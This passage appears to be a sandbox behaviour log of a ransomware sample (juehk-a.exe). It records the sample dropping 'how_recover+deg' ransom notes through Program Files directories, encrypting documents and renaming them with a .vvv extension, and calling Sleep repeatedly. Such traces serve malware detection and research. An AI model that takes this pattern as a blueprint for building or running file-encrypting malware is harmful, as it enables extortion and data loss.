- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521408
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88710
- mode: created
- sequenceNumber: 1746
- value: C:\Program Files\Common Files\System\ado\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521409
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88716
- mode: created
- sequenceNumber: 1747
- value: C:\Program Files\Common Files\System\ado\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521410
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88722
- mode: created
- sequenceNumber: 1748
- value: C:\Program Files\Common Files\System\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521411
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88729
- mode: created
- sequenceNumber: 1749
- value: C:\Program Files\Common Files\System\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521412
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88758
- mode: created
- sequenceNumber: 1750
- value: C:\Program Files\Common Files\System\msadc\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521413
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88765
- mode: created
- sequenceNumber: 1751
- value: C:\Program Files\Common Files\System\msadc\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521414
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88771
- mode: created
- sequenceNumber: 1752
- value: C:\Program Files\Common Files\System\msadc\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521415
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88778
- mode: created
- sequenceNumber: 1753
- value: C:\Program Files\Common Files\System\msadc\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521416
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88803
- mode: created
- sequenceNumber: 1754
- value: C:\Program Files\Common Files\System\MSMAPI\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521417
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88809
- mode: created
- sequenceNumber: 1755
- value: C:\Program Files\Common Files\System\MSMAPI\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521418
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88815
- mode: created
- sequenceNumber: 1756
- value: C:\Program Files\Common Files\System\MSMAPI\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521419
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88821
- mode: created
- sequenceNumber: 1757
- value: C:\Program Files\Common Files\System\MSMAPI\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521420
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88838
- mode: created
- sequenceNumber: 1758
- value: C:\Program Files\Common Files\System\Ole DB\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521421
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88844
- mode: created
- sequenceNumber: 1759
- value: C:\Program Files\Common Files\System\Ole DB\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521422
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88851
- mode: created
- sequenceNumber: 1760
- value: C:\Program Files\Common Files\System\Ole DB\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521423
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88857
- mode: created
- sequenceNumber: 1761
- value: C:\Program Files\Common Files\System\Ole DB\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521424
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88863
- mode: created
- sequenceNumber: 1762
- value: C:\Program Files\Common Files\System\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521425
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88868
- mode: created
- sequenceNumber: 1763
- value: C:\Program Files\Common Files\System\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521426
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88884
- mode: created
- sequenceNumber: 1764
- value: C:\Program Files\Common Files\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521427
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88891
- mode: created
- sequenceNumber: 1765
- value: C:\Program Files\Common Files\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521428
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88897
- mode: created
- sequenceNumber: 1766
- value: C:\Program Files\Debugging Tools for Windows (x64)\1394\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521429
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88904
- mode: created
- sequenceNumber: 1767
- value: C:\Program Files\Debugging Tools for Windows (x64)\1394\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521430
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88911
- mode: open
- sequenceNumber: 1768
- value: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc
- filesize: 71168
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520408
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88941
- mode: rename
- sequenceNumber: 1769
- filesize: 71598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\adplus.doc.vvv
- ads:
- fid (ads:): 562949953520408
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88949
- mode: open
- sequenceNumber: 1770
- value: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc
- filesize: 56832
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520426
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88959
- mode: rename
- sequenceNumber: 1771
- filesize: 57262
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\dml.doc.vvv
- ads:
- fid (ads:): 562949953520426
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88967
- mode: open
- sequenceNumber: 1772
- value: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc
- filesize: 1196032
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520436
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89083
- mode: rename
- sequenceNumber: 1773
- filesize: 1196462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc.vvv
- ads:
- fid (ads:): 562949953520436
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89090
- mode: open
- sequenceNumber: 1774
- value: C:\Program Files\Debugging Tools for Windows (x64)\license.txt
- filesize: 10237
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520438
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89148
- mode: rename
- sequenceNumber: 1775
- filesize: 10654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\license.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\license.txt.vvv
- ads:
- fid (ads:): 562949953520438
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89168
- mode: open
- sequenceNumber: 1776
- value: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt
- filesize: 2819
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520444
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89250
- mode: rename
- sequenceNumber: 1777
- filesize: 3246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\redist.txt.vvv
- ads:
- fid (ads:): 562949953520444
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89256
- mode: open
- sequenceNumber: 1778
- value: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt
- filesize: 12615
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520445
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89289
- mode: rename
- sequenceNumber: 1779
- filesize: 13038
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt.vvv
- ads:
- fid (ads:): 562949953520445
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89353
- mode: created
- sequenceNumber: 1780
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\help\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521431
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89362
- mode: created
- sequenceNumber: 1781
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\help\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521432
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89397
- mode: created
- sequenceNumber: 1782
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521433
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89402
- mode: created
- sequenceNumber: 1783
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521434
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89412
- mode: created
- sequenceNumber: 1784
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\amd64\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521435
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89416
- mode: created
- sequenceNumber: 1785
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\amd64\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521436
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89421
- mode: created
- sequenceNumber: 1786
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521437
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89427
- mode: created
- sequenceNumber: 1787
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521438
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89434
- mode: created
- sequenceNumber: 1788
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\ia64\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521439
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89454
- mode: created
- sequenceNumber: 1789
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\ia64\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521440
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89461
- mode: created
- sequenceNumber: 1790
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521441
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89467
- mode: created
- sequenceNumber: 1791
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521442
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89623
- mode: created
- sequenceNumber: 1792
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\adp_ext\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521443
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89630
- mode: created
- sequenceNumber: 1793
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\adp_ext\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521444
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89637
- mode: created
- sequenceNumber: 1794
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\analyze_continue\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521445
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89658
- mode: open
- sequenceNumber: 1795
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt
- filesize: 496
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520501
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89668
- mode: rename
- sequenceNumber: 1796
- filesize: 926
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt.vvv
- ads:
- fid (ads:): 562949953520501
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89688
- mode: open
- sequenceNumber: 1797
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt
- filesize: 4423
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520510
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89698
- mode: rename
- sequenceNumber: 1798
- filesize: 4846
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\exts\readme.txt.vvv
- ads:
- fid (ads:): 562949953520510
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89708
- mode: open
- sequenceNumber: 1799
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt
- filesize: 3458
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520524
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89717
- mode: rename
- sequenceNumber: 1800
- filesize: 3886
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\readme.txt.vvv
- ads:
- fid (ads:): 562949953520524
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 89894
- mode: open
- sequenceNumber: 1801
- value: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt
- filesize: 2952
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520532
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 89914
- mode: rename
- sequenceNumber: 1802
- filesize: 3374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\simplext\readme.txt.vvv
- ads:
- fid (ads:): 562949953520532
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 89943
- repeat: 8000
- sequenceNumber: 1803
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 89956
- mode: open
- sequenceNumber: 1804
- value: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc
- filesize: 111104
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520542
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90004
- mode: rename
- sequenceNumber: 1805
- filesize: 111534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\srcsrv\srcsrv.doc.vvv
- ads:
- fid (ads:): 562949953520542
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90012
- mode: open
- sequenceNumber: 1806
- value: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc
- filesize: 281600
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520558
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90046
- mode: rename
- sequenceNumber: 1807
- filesize: 282030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\symproxy\symhttp.doc.vvv
- ads:
- fid (ads:): 562949953520558
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90072
- mode: open
- sequenceNumber: 1808
- value: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc
- filesize: 550912
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520578
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90113
- mode: rename
- sequenceNumber: 1809
- filesize: 551342
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\themes\themes.doc.vvv
- ads:
- fid (ads:): 562949953520578
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90123
- mode: open
- sequenceNumber: 1810
- value: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt
- filesize: 157018
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520581
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90135
- mode: rename
- sequenceNumber: 1811
- filesize: 157438
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt
- new_name: C:\Program Files\Debugging Tools for Windows (x64)\triage\pooltag.txt.vvv
- ads:
- fid (ads:): 562949953520581
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90225
- mode: failed
- sequenceNumber: 1812
- value: C:\Program Files\DVD Maker\Shared\DissolveAnother.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90230
- mode: failed
- sequenceNumber: 1813
- value: C:\Program Files\DVD Maker\Shared\DissolveNoise.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90250
- mode: failed
- sequenceNumber: 1814
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90256
- mode: failed
- sequenceNumber: 1815
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90262
- mode: failed
- sequenceNumber: 1816
